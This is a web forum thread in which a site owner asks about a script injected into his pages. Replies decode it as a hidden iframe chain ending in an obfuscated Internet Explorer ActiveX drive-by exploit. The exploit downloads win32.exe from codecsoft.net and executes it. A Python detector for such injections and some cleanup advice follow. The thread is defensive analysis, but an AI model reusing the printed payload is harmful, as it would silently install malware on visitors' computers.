hey all, found this on my site > came from "codecsoft.net" - i think. <script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%68%74%74%70%3a%2f%2f%63%6f%64%65%63%73%6f%66%74%2e%6e%65%74%2f%73%74%72%6f%6e%67%2f%31%36%37%2f%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%3b'));</script> what is that? i removed it, and changed my password. but WHAT IS IT? THANKS mike
Unescapes to:
document.write('<iframe src=http://codecsoft.net/strong/167/ width=1 height=1></iframe>');
And that page unescapes to:
// Š ´Ââ à ¨©  å :) --> <style> * {CURSOR: url("123.htm")} </style> <iframe src="exp1.htm" width="1" height="1"></iframe> // Š ´Ââ à ¨©  å :) --> <iframe src="exp2.htm" width="1" height="1"></iframe> // Š ´Ââ à ¨©  å :) --> <iframe src="exp3.htm" width="1" height="1"></iframe> // Š ´Ââ à ¨©  å :) --> <iframe src="exp4.htm" width="1" height="1"></iframe>
And the first page goes to:
<script language="JavaScript"> // Š ´Ââ à ¨©  å :) --> var xname='ob'+'j'; var obj_RDS = document.createElement(xname+'ect'); var ids='i'+'d'; var xrds='R'+'DS'; obj_RDS.setAttribute(ids,'obj_'+xrds); var cls_id1='cl'+'si'+'d:BD'+'96C5'; var cls_id2='56'+'-65'+'A3-11'+'D0-983A'+'-00C04'+'FC29E36'; obj_RDS.setAttribute('classid',cls_id1+cls_id2); var is__obj_adodb = 0; // Š ´Ââ à ¨©  å :) --> var xname_str="ad"+"odb.s"+"tream"; try { var obj_adodb = obj_RDS.CreateObject(xname_str,""); is__obj_adodb = 1; } catch(e){} if (is__obj_adodb != 1) { try { var obj_adodb = new ActiveXObject(xname_str); is__obj_adodb = 1; } catch(e){} } if (is__obj_adodb == 1) { try { var appl_="Sh"+"el"+"l.App"+"lica"+"tion"; var obj_ShellApp = obj_RDS.CreateObject(appl_,""); var xml_name="ms"+"xm"+"l2.X"+"MLH"+"TTP"; var obj_msxml2 = new ActiveXObject(xml_name); // Š ´Ââ à ¨©  å :) --> obj_msxml2.open("G"+"ET","http://codecsoft.net/adv/167/win32.exe",false); // Š ´Ââ à ¨©  å :) --> obj_msxml2.send(); obj_adodb.type = 1; obj_adodb.open(); obj_adodb.Write(obj_msxml2.responseBody); // Š ´Ââ à ¨©  å :) --> var fn = "C:\\xx1232255"+".e"+"xe"; obj_adodb.SaveToFile(fn,2); obj_adodb.close(); obj_ShellApp.ShellExecute(fn); } catch(e){} } </script>
It looks very very very dodgy
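Added example, not code from the thread: a small Python checker that does the decoding step shown above for you, finding every eval(unescape('...')) block in a saved page, decoding it the way JavaScript's unescape() would, and listing the iframes it writes (flagging the 1x1 ones). The sample page and the host name malicious.example are constructed for the demo.

```python
import re

# eval(unescape('...')) wrapper as seen in the injected tag; the encoded string is group 2.
EVAL_UNESCAPE = re.compile(
    r"eval\s*\(\s*unescape\s*\(\s*(['\"])(.*?)\1\s*\)\s*\)", re.S)
IFRAME = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR = re.compile(r"(\w+)\s*=\s*['\"]?([^'\"\s>]+)")


def js_unescape(text):
    """Decode like JavaScript's unescape(): %uXXXX and %XX sequences."""
    def repl(m):
        return chr(int(m.group(1) or m.group(2), 16))
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})", repl, text)


def js_escape(text):
    """Percent-encode every character, the way the injected tag was encoded
    (only used here to build the constructed sample page)."""
    return "".join("%%%02X" % ord(c) for c in text)


def find_injected_iframes(html):
    """One record per eval(unescape(...)) block: offset in the file, decoded
    JavaScript, and each iframe it writes with a 'hidden' flag when both
    width and height are 1 or less (the 1x1 trick used in the thread)."""
    findings = []
    for m in EVAL_UNESCAPE.finditer(html):
        decoded = js_unescape(m.group(2))
        frames = []
        for fm in IFRAME.finditer(decoded):
            attrs = {k.lower(): v for k, v in ATTR.findall(fm.group(1))}
            size = (attrs.get("width", ""), attrs.get("height", ""))
            hidden = all(s.isdigit() and int(s) <= 1 for s in size)
            frames.append({"src": attrs.get("src"), "hidden": hidden})
        findings.append({"offset": m.start(), "decoded": decoded, "iframes": frames})
    return findings


# Constructed sample: same shape as the posted tag, with a placeholder host.
PAYLOAD = ("document.write('<iframe src=http://malicious.example/x/ "
           "width=1 height=1></iframe>');")
SAMPLE_HTML = ("<html><body><h1>My site</h1>\n"
               "<script>eval(unescape('" + js_escape(PAYLOAD) + "'));</script>\n"
               "</body></html>")

if __name__ == "__main__":
    for f in find_injected_iframes(SAMPLE_HTML):
        print("offset", f["offset"], "decoded:", f["decoded"])
        for fr in f["iframes"]:
            print("  iframe ->", fr["src"], "(hidden 1x1)" if fr["hidden"] else "")
```

Run it over each HTML file of the site (read the file and pass its text to find_injected_iframes) to list every injected frame and its destination before cleaning.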
thank gawd for you SMART people around here. 1) i removed it from my site - so should i be okay now? 2) should i inform my host? 3) probably impossible to track these people? 4) appears as though NO SERIOUS DAMAGE - could they have just been "playing around" to show their skills? THANKS AGAIN! mike
Yes, better to contact them and let them know; they might track them down and see if they did other things.
It looks very much like an Internet Explorer hack. I would recommend updating your anti-virus, clearing all temp files and checking your root C: for .exe files with weird filenames like xx1232255.exe. It could be an MSXML hack, which I think was patched some time ago. Having just checked Google, it's Win32.malware.gen and there are some removal instructions at http://fileinfo.prevx.com/spyware/qq8b2181306289-XX1236408378/XX1232255.EXE.html but just Google the filename and you'll find loads.
thanks again! QUESTION/CLARIFICATION: it's not my server. i just have shared space there. i.e. i purchased shared hosting there. so, re: your message above, you mean that: MY HOST should follow the removal instructions - right. in other words, it DID NOT affect my personal computer - correct? my computer anti-virus indicates NO SIGN of malware or otherwise. PLEASE CLARIFY. cheers mike
It had the potential to affect any computer that viewed your website and ran that script. Meaning you should check too. Also, see if there is any way the person could have injected that into your website and remove it or secure it.
It is probably a "Zombies-R-Us" hack. Your site was set up as a point to distribute, and create zombies. The code, which was oh-so-bravely downloaded by John@PP does the following: tries to write to the registry entry to check if ActiveX is available in {BD96C556-65A3-11D0-983A-00C04FC29E36} opens a stream to codecsoft.net downloads a file win32.exe saves it to a file C:\xx1232255.exe and executes it in the background, while masking any errors. Your site was used to distribute this script (and the others), to anyone who visited your site and is vulnerable.
thanks DC + libertate, et al. i will look for that file and go from there. i removed the script from my site/HTML, and double-checked. it's gone. THANKS! mike
i just checked my personal computer (i use FIREFOX), and i visited my site several times and saw that script, (took me 2 weeks to clue in!!!) and NO SIGN of any file on my computer that contains 1232255 in any way. THANKS AGAIN. mike
nuthin you can do except delete da script, but may i suggest redesigning those pages from scratch, just so that all tha crud left in bits and pieces doesn't slow it down. it's not necessary but worth it in the long run.